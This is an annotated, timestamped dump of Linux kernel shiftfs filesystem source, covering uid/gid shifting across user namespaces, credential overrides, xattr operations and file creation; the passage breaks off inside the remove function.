2019-04-04 13:39:13 +00:00
|
|
|
#include <linux/btrfs.h>
|
2019-04-04 13:39:12 +00:00
|
|
|
#include <linux/capability.h>
|
2019-04-04 13:39:11 +00:00
|
|
|
#include <linux/cred.h>
|
|
|
|
#include <linux/mount.h>
|
2019-04-04 13:39:13 +00:00
|
|
|
#include <linux/fdtable.h>
|
2019-04-04 13:39:11 +00:00
|
|
|
#include <linux/file.h>
|
|
|
|
#include <linux/fs.h>
|
|
|
|
#include <linux/namei.h>
|
|
|
|
#include <linux/module.h>
|
|
|
|
#include <linux/kernel.h>
|
|
|
|
#include <linux/magic.h>
|
|
|
|
#include <linux/parser.h>
|
2019-04-04 13:39:12 +00:00
|
|
|
#include <linux/security.h>
|
2019-04-04 13:39:11 +00:00
|
|
|
#include <linux/seq_file.h>
|
|
|
|
#include <linux/statfs.h>
|
|
|
|
#include <linux/slab.h>
|
|
|
|
#include <linux/user_namespace.h>
|
|
|
|
#include <linux/uidgid.h>
|
|
|
|
#include <linux/xattr.h>
|
2019-04-04 13:39:12 +00:00
|
|
|
#include <linux/posix_acl.h>
|
|
|
|
#include <linux/posix_acl_xattr.h>
|
|
|
|
#include <linux/uio.h>
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
struct shiftfs_super_info {
|
|
|
|
struct vfsmount *mnt;
|
|
|
|
struct user_namespace *userns;
|
2019-04-04 13:39:12 +00:00
|
|
|
/* creds of process who created the super block */
|
|
|
|
const struct cred *creator_cred;
|
2019-04-04 13:39:11 +00:00
|
|
|
bool mark;
|
2019-04-04 13:39:12 +00:00
|
|
|
unsigned int passthrough;
|
2019-04-15 13:21:55 +00:00
|
|
|
unsigned int passthrough_mark;
|
2019-04-04 13:39:11 +00:00
|
|
|
};
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
|
|
|
|
umode_t mode, dev_t dev, struct dentry *dentry);
|
|
|
|
|
|
|
|
#define SHIFTFS_PASSTHROUGH_NONE 0
|
|
|
|
#define SHIFTFS_PASSTHROUGH_STAT 1
|
2019-04-04 13:39:13 +00:00
|
|
|
#define SHIFTFS_PASSTHROUGH_IOCTL 2
|
|
|
|
#define SHIFTFS_PASSTHROUGH_ALL \
|
|
|
|
(SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL)
|
|
|
|
|
|
|
|
static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
|
|
|
|
{
|
|
|
|
if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
|
|
|
|
return false;
|
|
|
|
|
|
|
|
return true;
|
|
|
|
}
|
2019-04-04 13:39:12 +00:00
|
|
|
|
|
|
|
static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
|
|
|
|
{
|
|
|
|
if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
|
|
|
|
return false;
|
|
|
|
|
|
|
|
return true;
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
enum {
|
|
|
|
OPT_MARK,
|
2019-04-04 13:39:12 +00:00
|
|
|
OPT_PASSTHROUGH,
|
2019-04-04 13:39:11 +00:00
|
|
|
OPT_LAST,
|
|
|
|
};
|
|
|
|
|
|
|
|
/* global filesystem options */
|
|
|
|
static const match_table_t tokens = {
|
|
|
|
{ OPT_MARK, "mark" },
|
2019-04-04 13:39:12 +00:00
|
|
|
{ OPT_PASSTHROUGH, "passthrough=%u" },
|
2019-04-04 13:39:11 +00:00
|
|
|
{ OPT_LAST, NULL }
|
|
|
|
};
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static const struct cred *shiftfs_override_creds(const struct super_block *sb)
|
2019-04-04 13:39:11 +00:00
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct shiftfs_super_info *sbinfo = sb->s_fs_info;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
return override_creds(sbinfo->creator_cred);
|
|
|
|
}
|
|
|
|
|
|
|
|
static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
|
|
|
|
struct cred *newcred)
|
|
|
|
{
|
|
|
|
revert_creds(oldcred);
|
|
|
|
put_cred(newcred);
|
|
|
|
}
|
|
|
|
|
2019-11-01 18:35:25 +00:00
|
|
|
static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
|
|
|
|
kuid_t kuid)
|
|
|
|
{
|
|
|
|
uid_t uid = from_kuid(from, kuid);
|
|
|
|
return make_kuid(to, uid);
|
|
|
|
}
|
|
|
|
|
|
|
|
static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
|
|
|
|
kgid_t kgid)
|
|
|
|
{
|
|
|
|
gid_t gid = from_kgid(from, kgid);
|
|
|
|
return make_kgid(to, gid);
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static int shiftfs_override_object_creds(const struct super_block *sb,
|
|
|
|
const struct cred **oldcred,
|
|
|
|
struct cred **newcred,
|
|
|
|
struct dentry *dentry, umode_t mode,
|
|
|
|
bool hardlink)
|
|
|
|
{
|
2019-11-01 18:35:25 +00:00
|
|
|
struct shiftfs_super_info *sbinfo = sb->s_fs_info;
|
2019-04-04 13:39:12 +00:00
|
|
|
kuid_t fsuid = current_fsuid();
|
|
|
|
kgid_t fsgid = current_fsgid();
|
|
|
|
|
|
|
|
*oldcred = shiftfs_override_creds(sb);
|
|
|
|
|
|
|
|
*newcred = prepare_creds();
|
|
|
|
if (!*newcred) {
|
|
|
|
revert_creds(*oldcred);
|
|
|
|
return -ENOMEM;
|
|
|
|
}
|
|
|
|
|
2019-11-01 18:35:25 +00:00
|
|
|
(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
|
|
|
|
(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
|
2019-04-04 13:39:12 +00:00
|
|
|
|
|
|
|
if (!hardlink) {
|
|
|
|
int err = security_dentry_create_files_as(dentry, mode,
|
|
|
|
&dentry->d_name,
|
|
|
|
*oldcred, *newcred);
|
|
|
|
if (err) {
|
|
|
|
shiftfs_revert_object_creds(*oldcred, *newcred);
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
put_cred(override_creds(*newcred));
|
|
|
|
return 0;
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static void shiftfs_copyattr(struct inode *from, struct inode *to)
|
|
|
|
{
|
|
|
|
struct user_namespace *from_ns = from->i_sb->s_user_ns;
|
|
|
|
struct user_namespace *to_ns = to->i_sb->s_user_ns;
|
|
|
|
|
|
|
|
to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid);
|
|
|
|
to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid);
|
|
|
|
to->i_mode = from->i_mode;
|
|
|
|
to->i_atime = from->i_atime;
|
|
|
|
to->i_mtime = from->i_mtime;
|
|
|
|
to->i_ctime = from->i_ctime;
|
|
|
|
i_size_write(to, i_size_read(from));
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static void shiftfs_copyflags(struct inode *from, struct inode *to)
|
|
|
|
{
|
|
|
|
unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
inode_set_flags(to, from->i_flags & mask, mask);
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static void shiftfs_file_accessed(struct file *file)
|
2019-04-04 13:39:11 +00:00
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct inode *upperi, *loweri;
|
|
|
|
|
|
|
|
if (file->f_flags & O_NOATIME)
|
2019-04-04 13:39:11 +00:00
|
|
|
return;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
upperi = file_inode(file);
|
|
|
|
loweri = upperi->i_private;
|
|
|
|
|
|
|
|
if (!loweri)
|
|
|
|
return;
|
|
|
|
|
|
|
|
upperi->i_mtime = loweri->i_mtime;
|
|
|
|
upperi->i_ctime = loweri->i_ctime;
|
|
|
|
|
|
|
|
touch_atime(&file->f_path);
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo,
|
|
|
|
char *options)
|
2019-04-04 13:39:11 +00:00
|
|
|
{
|
|
|
|
char *p;
|
|
|
|
substring_t args[MAX_OPT_ARGS];
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
sbinfo->mark = false;
|
|
|
|
sbinfo->passthrough = 0;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
while ((p = strsep(&options, ",")) != NULL) {
|
2019-04-04 13:39:12 +00:00
|
|
|
int err, intarg, token;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
if (!*p)
|
|
|
|
continue;
|
|
|
|
|
|
|
|
token = match_token(p, tokens, args);
|
|
|
|
switch (token) {
|
|
|
|
case OPT_MARK:
|
2019-04-04 13:39:12 +00:00
|
|
|
sbinfo->mark = true;
|
|
|
|
break;
|
|
|
|
case OPT_PASSTHROUGH:
|
|
|
|
err = match_int(&args[0], &intarg);
|
|
|
|
if (err)
|
|
|
|
return err;
|
|
|
|
|
|
|
|
if (intarg & ~SHIFTFS_PASSTHROUGH_ALL)
|
|
|
|
return -EINVAL;
|
|
|
|
|
|
|
|
sbinfo->passthrough = intarg;
|
2019-04-04 13:39:11 +00:00
|
|
|
break;
|
|
|
|
default:
|
|
|
|
return -EINVAL;
|
|
|
|
}
|
|
|
|
}
|
2019-04-04 13:39:12 +00:00
|
|
|
|
2019-04-04 13:39:11 +00:00
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
|
|
|
static void shiftfs_d_release(struct dentry *dentry)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct dentry *lowerd = dentry->d_fsdata;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (lowerd)
|
|
|
|
dput(lowerd);
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static struct dentry *shiftfs_d_real(struct dentry *dentry,
|
|
|
|
const struct inode *inode)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct dentry *lowerd = dentry->d_fsdata;
|
|
|
|
|
|
|
|
if (inode && d_inode(dentry) == inode)
|
|
|
|
return dentry;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
lowerd = d_real(lowerd, inode);
|
|
|
|
if (lowerd && (!inode || inode == d_inode(lowerd)))
|
|
|
|
return lowerd;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry,
|
|
|
|
inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0);
|
|
|
|
return dentry;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
int err = 1;
|
|
|
|
struct dentry *lowerd = dentry->d_fsdata;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2020-06-23 17:46:15 +00:00
|
|
|
if (d_is_negative(lowerd) != d_is_negative(dentry))
|
|
|
|
return 0;
|
|
|
|
|
|
|
|
if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE))
|
2019-04-04 13:39:12 +00:00
|
|
|
err = lowerd->d_op->d_weak_revalidate(lowerd, flags);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (d_really_is_positive(dentry)) {
|
|
|
|
struct inode *inode = d_inode(dentry);
|
|
|
|
struct inode *loweri = d_inode(lowerd);
|
|
|
|
|
|
|
|
shiftfs_copyattr(loweri, inode);
|
|
|
|
}
|
|
|
|
|
|
|
|
return err;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
int err = 1;
|
|
|
|
struct dentry *lowerd = dentry->d_fsdata;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2020-06-23 17:46:15 +00:00
|
|
|
if (d_unhashed(lowerd) ||
|
|
|
|
((d_is_negative(lowerd) != d_is_negative(dentry))))
|
|
|
|
return 0;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (flags & LOOKUP_RCU)
|
|
|
|
return -ECHILD;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2020-06-23 17:46:15 +00:00
|
|
|
if ((lowerd->d_flags & DCACHE_OP_REVALIDATE))
|
2019-04-04 13:39:12 +00:00
|
|
|
err = lowerd->d_op->d_revalidate(lowerd, flags);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (d_really_is_positive(dentry)) {
|
|
|
|
struct inode *inode = d_inode(dentry);
|
|
|
|
struct inode *loweri = d_inode(lowerd);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
shiftfs_copyattr(loweri, inode);
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
return err;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static const struct dentry_operations shiftfs_dentry_ops = {
|
2019-04-04 13:39:12 +00:00
|
|
|
.d_release = shiftfs_d_release,
|
|
|
|
.d_real = shiftfs_d_real,
|
|
|
|
.d_revalidate = shiftfs_d_revalidate,
|
2019-04-04 13:39:11 +00:00
|
|
|
.d_weak_revalidate = shiftfs_d_weak_revalidate,
|
|
|
|
};
|
|
|
|
|
|
|
|
static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
|
|
|
|
struct delayed_call *done)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
const char *p;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
struct dentry *lowerd;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
/* RCU lookup not supported */
|
|
|
|
if (!dentry)
|
2019-04-04 13:39:11 +00:00
|
|
|
return ERR_PTR(-ECHILD);
|
2019-04-04 13:39:12 +00:00
|
|
|
|
|
|
|
lowerd = dentry->d_fsdata;
|
|
|
|
oldcred = shiftfs_override_creds(dentry->d_sb);
|
|
|
|
p = vfs_get_link(lowerd, done);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
return p;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
|
|
|
|
const char *name, const void *value,
|
|
|
|
size_t size, int flags)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct dentry *lowerd = dentry->d_fsdata;
|
|
|
|
int err;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(dentry->d_sb);
|
|
|
|
err = vfs_setxattr(lowerd, name, value, size, flags);
|
|
|
|
revert_creds(oldcred);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
shiftfs_copyattr(lowerd->d_inode, inode);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_xattr_get(const struct xattr_handler *handler,
|
|
|
|
struct dentry *dentry, struct inode *inode,
|
|
|
|
const char *name, void *value, size_t size)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct dentry *lowerd = dentry->d_fsdata;
|
2019-04-04 13:39:11 +00:00
|
|
|
int err;
|
2019-04-04 13:39:12 +00:00
|
|
|
const struct cred *oldcred;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
oldcred = shiftfs_override_creds(dentry->d_sb);
|
|
|
|
err = vfs_getxattr(lowerd, name, value, size);
|
|
|
|
revert_creds(oldcred);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
|
|
|
|
size_t size)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct dentry *lowerd = dentry->d_fsdata;
|
2019-04-04 13:39:11 +00:00
|
|
|
int err;
|
2019-04-04 13:39:12 +00:00
|
|
|
const struct cred *oldcred;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
oldcred = shiftfs_override_creds(dentry->d_sb);
|
|
|
|
err = vfs_listxattr(lowerd, list, size);
|
|
|
|
revert_creds(oldcred);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_removexattr(struct dentry *dentry, const char *name)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct dentry *lowerd = dentry->d_fsdata;
|
2019-04-04 13:39:11 +00:00
|
|
|
int err;
|
2019-04-04 13:39:12 +00:00
|
|
|
const struct cred *oldcred;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(dentry->d_sb);
|
|
|
|
err = vfs_removexattr(lowerd, name);
|
|
|
|
revert_creds(oldcred);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
/* update c/mtime */
|
|
|
|
shiftfs_copyattr(lowerd->d_inode, d_inode(dentry));
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_xattr_set(const struct xattr_handler *handler,
|
|
|
|
struct dentry *dentry, struct inode *inode,
|
|
|
|
const char *name, const void *value, size_t size,
|
|
|
|
int flags)
|
|
|
|
{
|
|
|
|
if (!value)
|
|
|
|
return shiftfs_removexattr(dentry, name);
|
|
|
|
return shiftfs_setxattr(dentry, inode, name, value, size, flags);
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static int shiftfs_inode_test(struct inode *inode, void *data)
|
2019-04-04 13:39:11 +00:00
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
return inode->i_private == data;
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static int shiftfs_inode_set(struct inode *inode, void *data)
|
|
|
|
{
|
|
|
|
inode->i_private = data;
|
|
|
|
return 0;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
|
|
|
|
umode_t mode, const char *symlink,
|
|
|
|
struct dentry *hardlink, bool excl)
|
2019-04-04 13:39:11 +00:00
|
|
|
{
|
|
|
|
int err;
|
2019-04-04 13:39:12 +00:00
|
|
|
const struct cred *oldcred;
|
|
|
|
struct cred *newcred;
|
|
|
|
void *loweri_iop_ptr = NULL;
|
|
|
|
umode_t modei = mode;
|
|
|
|
struct super_block *dir_sb = diri->i_sb;
|
|
|
|
struct dentry *lowerd_new = dentry->d_fsdata;
|
|
|
|
struct inode *inode = NULL, *loweri_dir = diri->i_private;
|
|
|
|
const struct inode_operations *loweri_dir_iop = loweri_dir->i_op;
|
|
|
|
struct dentry *lowerd_link = NULL;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2023-05-10 20:44:13 +00:00
|
|
|
inode_lock_nested(loweri_dir, I_MUTEX_PARENT);
|
|
|
|
|
2019-04-04 13:39:11 +00:00
|
|
|
if (hardlink) {
|
2019-04-04 13:39:12 +00:00
|
|
|
loweri_iop_ptr = loweri_dir_iop->link;
|
2019-04-04 13:39:11 +00:00
|
|
|
} else {
|
|
|
|
switch (mode & S_IFMT) {
|
|
|
|
case S_IFDIR:
|
2019-04-04 13:39:12 +00:00
|
|
|
loweri_iop_ptr = loweri_dir_iop->mkdir;
|
2019-04-04 13:39:11 +00:00
|
|
|
break;
|
|
|
|
case S_IFREG:
|
2019-04-04 13:39:12 +00:00
|
|
|
loweri_iop_ptr = loweri_dir_iop->create;
|
2019-04-04 13:39:11 +00:00
|
|
|
break;
|
|
|
|
case S_IFLNK:
|
2019-04-04 13:39:12 +00:00
|
|
|
loweri_iop_ptr = loweri_dir_iop->symlink;
|
|
|
|
break;
|
|
|
|
case S_IFSOCK:
|
|
|
|
/* fall through */
|
|
|
|
case S_IFIFO:
|
|
|
|
loweri_iop_ptr = loweri_dir_iop->mknod;
|
|
|
|
break;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
}
|
2019-04-04 13:39:12 +00:00
|
|
|
if (!loweri_iop_ptr) {
|
|
|
|
err = -EINVAL;
|
|
|
|
goto out_iput;
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (!hardlink) {
|
|
|
|
inode = new_inode(dir_sb);
|
|
|
|
if (!inode) {
|
|
|
|
err = -ENOMEM;
|
|
|
|
goto out_iput;
|
|
|
|
}
|
|
|
|
|
|
|
|
/*
|
|
|
|
* new_inode() will have added the new inode to the super
|
|
|
|
* block's list of inodes. Further below we will call
|
|
|
|
* inode_insert5() Which would perform the same operation again
|
|
|
|
* thereby corrupting the list. To avoid this raise I_CREATING
|
|
|
|
* in i_state which will cause inode_insert5() to skip this
|
|
|
|
* step. I_CREATING will be cleared by d_instantiate_new()
|
|
|
|
* below.
|
|
|
|
*/
|
|
|
|
spin_lock(&inode->i_lock);
|
|
|
|
inode->i_state |= I_CREATING;
|
|
|
|
spin_unlock(&inode->i_lock);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
inode_init_owner(inode, diri, mode);
|
|
|
|
modei = inode->i_mode;
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred,
|
|
|
|
dentry, modei, hardlink != NULL);
|
|
|
|
if (err)
|
|
|
|
goto out_iput;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
if (hardlink) {
|
2019-04-04 13:39:12 +00:00
|
|
|
lowerd_link = hardlink->d_fsdata;
|
|
|
|
err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
|
2019-04-04 13:39:11 +00:00
|
|
|
} else {
|
2019-04-04 13:39:12 +00:00
|
|
|
switch (modei & S_IFMT) {
|
2019-04-04 13:39:11 +00:00
|
|
|
case S_IFDIR:
|
2019-04-04 13:39:12 +00:00
|
|
|
err = vfs_mkdir(loweri_dir, lowerd_new, modei);
|
2019-04-04 13:39:11 +00:00
|
|
|
break;
|
|
|
|
case S_IFREG:
|
2019-04-04 13:39:12 +00:00
|
|
|
err = vfs_create(loweri_dir, lowerd_new, modei, excl);
|
2019-04-04 13:39:11 +00:00
|
|
|
break;
|
|
|
|
case S_IFLNK:
|
2019-04-04 13:39:12 +00:00
|
|
|
err = vfs_symlink(loweri_dir, lowerd_new, symlink);
|
|
|
|
break;
|
|
|
|
case S_IFSOCK:
|
|
|
|
/* fall through */
|
|
|
|
case S_IFIFO:
|
|
|
|
err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
|
|
|
|
break;
|
|
|
|
default:
|
|
|
|
err = -EINVAL;
|
|
|
|
break;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
shiftfs_revert_object_creds(oldcred, newcred);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (!err && WARN_ON(!lowerd_new->d_inode))
|
|
|
|
err = -EIO;
|
2019-04-04 13:39:11 +00:00
|
|
|
if (err)
|
2019-04-04 13:39:12 +00:00
|
|
|
goto out_iput;
|
|
|
|
|
|
|
|
if (hardlink) {
|
|
|
|
inode = d_inode(hardlink);
|
|
|
|
ihold(inode);
|
|
|
|
|
|
|
|
/* copy up times from lower inode */
|
|
|
|
shiftfs_copyattr(d_inode(lowerd_link), inode);
|
|
|
|
set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink);
|
|
|
|
d_instantiate(dentry, inode);
|
|
|
|
} else {
|
|
|
|
struct inode *inode_tmp;
|
|
|
|
struct inode *loweri_new = d_inode(lowerd_new);
|
|
|
|
|
|
|
|
inode_tmp = inode_insert5(inode, (unsigned long)loweri_new,
|
|
|
|
shiftfs_inode_test, shiftfs_inode_set,
|
|
|
|
loweri_new);
|
|
|
|
if (unlikely(inode_tmp != inode)) {
|
|
|
|
pr_err_ratelimited("shiftfs: newly created inode found in cache\n");
|
|
|
|
iput(inode_tmp);
|
|
|
|
err = -EINVAL;
|
|
|
|
goto out_iput;
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
ihold(loweri_new);
|
|
|
|
shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode,
|
|
|
|
0, lowerd_new);
|
|
|
|
d_instantiate_new(dentry, inode);
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
shiftfs_copyattr(loweri_dir, diri);
|
|
|
|
if (loweri_iop_ptr == loweri_dir_iop->mkdir)
|
|
|
|
set_nlink(diri, loweri_dir->i_nlink);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
inode = NULL;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
out_iput:
|
|
|
|
iput(inode);
|
|
|
|
inode_unlock(loweri_dir);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_create(struct inode *dir, struct dentry *dentry,
|
|
|
|
umode_t mode, bool excl)
|
|
|
|
{
|
|
|
|
mode |= S_IFREG;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
|
|
|
|
umode_t mode)
|
|
|
|
{
|
|
|
|
mode |= S_IFDIR;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
|
|
|
|
struct dentry *dentry)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
|
|
|
|
dev_t rdev)
|
|
|
|
{
|
|
|
|
if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
|
|
|
|
const char *symlink)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct dentry *lowerd = dentry->d_fsdata;
|
|
|
|
struct inode *loweri = dir->i_private;
|
2019-08-29 18:45:07 +00:00
|
|
|
struct inode *inode = d_inode(dentry);
|
2019-04-04 13:39:11 +00:00
|
|
|
int err;
|
2019-04-04 13:39:12 +00:00
|
|
|
const struct cred *oldcred;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2020-01-17 15:17:06 +00:00
|
|
|
dget(lowerd);
|
2019-04-04 13:39:12 +00:00
|
|
|
oldcred = shiftfs_override_creds(dentry->d_sb);
|
|
|
|
inode_lock_nested(loweri, I_MUTEX_PARENT);
|
2019-04-04 13:39:11 +00:00
|
|
|
if (rmdir)
|
2019-04-04 13:39:12 +00:00
|
|
|
err = vfs_rmdir(loweri, lowerd);
|
2019-04-04 13:39:11 +00:00
|
|
|
else
|
2019-04-04 13:39:12 +00:00
|
|
|
err = vfs_unlink(loweri, lowerd, NULL);
|
|
|
|
revert_creds(oldcred);
|
2019-04-04 13:39:11 +00:00
|
|
